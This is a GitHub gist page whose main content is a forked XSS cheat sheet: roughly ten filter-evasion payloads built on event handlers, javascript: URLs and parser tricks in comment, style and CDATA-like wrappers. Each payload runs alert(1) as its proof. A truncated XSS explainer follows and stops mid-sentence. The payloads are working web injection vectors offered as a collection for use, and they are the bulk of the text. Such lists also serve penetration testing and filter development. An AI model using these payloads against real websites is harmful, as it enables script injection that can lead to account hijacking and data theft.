Skip to content

Instantly share code, notes, and snippets.

View haqgroup125's full-sized avatar

haqgroup125

0 followers · 1 following
View GitHub Profile
@haqgroup125
haqgroup125 / xss.txt
Created October 5, 2025 10:18 — forked from dave5623/xss.txt
Xss Cheat Sheet from https://gbhackers.com/top-500-important-xss-cheat-sheet/
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
@haqgroup125
haqgroup125 / xss explain.md
Last active October 5, 2025 10:17 — forked from MilestoneTech/gist:b2828a6db30c21379ebd
Security - Cross-Site Scripting (XSS)

Cross-site Scripting (XSS) is the most prevalent web application security flaw and occurs when user supplied data is sent to the browser without properly validating or escaping that content. XSS flaws can allow the attacker to: